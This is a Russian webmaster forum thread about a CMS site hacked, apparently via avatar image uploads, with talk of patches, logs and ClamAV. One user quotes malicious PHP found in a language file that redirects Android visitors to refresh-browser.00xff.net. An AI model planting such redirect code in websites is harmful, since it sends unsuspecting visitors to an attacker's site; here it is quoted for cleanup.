- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
спасибо топику, удалил сразу левых пользователей, но у меня видимо или не смогли, либо не успели нигде аватарку залить, хотя теперь уже патч новый я залил.
До этого не стояло и потом по логам сервера спалил, что пытались проспамить и поломать его, но так как все на сервере, видимо не удалось это сделать
Точно, и взламывали разные версии, через аватарку
Если про 9.6...
1. Это факт был в логах зафиксирован на 9.6 или это наугад вывод только потому, что человек с таким ником был зарегистрирован?
Я в этом топике ни одного куска лога не увидел, подтверждающий, что 9.6 взломали именно через аву..
2. Для 9.6 было выпущено три баг-фикса. Все установлены на сайте?
Про нуллы никто никакой гарантии не даст, поэтому и говорить про них нет смысла.
На оф. сайте на эту тему паниковали те, у кого либо патчи не стояли, либо у кого уже 9.7 стояла, либо до кучи сайты с дырявыми модулями. Некоторые, кстати, патчи не ставили только потому, что у них модули переставали работать, т.е. сознательно шли на "подрыв"... :)
bunina
как-то так, потому что бот регился приблизительно 8-ого января, а ломали(менялась дата файлов) через дней 10
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?
Сейчас в панели ispmanager в настройках сервера заметил возможность установки Антивируса Clamav, не долго думая я его установил, кто в курсе что это за бесплатный зверёк и стоит ли его включить ?
http://www.clamav.net/lang/ru/about/
А у меня везде этот сайт в моб версии.
Уже все файлы перелапалтил, удалил много кода, но так и не нашел оставшиеся...
У кого ещё был код с этим сайтом? Какие файлы правили?
refresh-browser.00xff.net
Вот такой код
if(stripos($_SERVER['HTTP_USER_AGENT'],"Android")!==false)
{header('Location: http://refresh-browser.00xff.net/');exit;}
Нашел последний код.
По этому пути был
/language/Russian/website.lng
если на сайте закрыть регистрацию новых пользователей, то проблема решится?
нет :) попытаться убежать от проблемы != её решить.
Почему нет, только не ориентируйтесь на него полностью, он может быть полезным сигнализатором того, что у вас есть проблемы с вредоносными кодами.
Если сами не справляетесь не стоит делать какие-то ограничения по скрипту, лучше всего выяснить источник, стучите проверим на вирусы + дадим рекомендации!
Можно, но это не панацея... Он больше предназначен для защиты файлов сервера, а не файлов конкретного сайта неизвестно какой cms.
Нет, это зависит от того, кому разрешено публиковать новости. Ведь взломы идут через файлы, поддерживающие анимацию, т.е. gif.
А у меня везде этот сайт в моб версии.
Уже все файлы перелапалтил, удалил много кода, но так и не нашел оставшиеся...
У кого ещё был код с этим сайтом? Какие файлы правили?
Стесняюсь спросить... У вас основное направление сайта - именно WEB, а не для мобильных устройств? Вы когда сайт устанавливали права на файлы мобильного шаблона (включая htaccess шаблона для мобильной версии) тоже выставляли как указано в документации или продинамили за ненадобностью?